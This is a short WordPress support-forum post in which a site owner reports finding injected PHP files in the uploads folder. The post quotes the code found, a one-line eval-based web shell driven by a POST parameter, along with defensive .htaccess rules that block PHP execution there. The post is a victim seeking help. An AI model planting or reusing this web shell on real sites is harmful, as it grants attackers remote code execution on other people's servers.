Email without subject and php injection
-
Hi, i have sucuri on my site, but sometimes i receive a mail “email without subject” and find a *.php file under wp-content/uploads/ folder. This file contain a malicious code like this
`<?php @eval($_POST[“12345”]);?>984300′
In this folder i have an .htaccess file:
<Files *.php>
deny from all
</Files>
<FilesMatch “\.(?i:php)$”>
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>I do not understand how they can upload this .php file in the upload directory.
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
- The topic ‘Email without subject and php injection’ is closed to new replies.
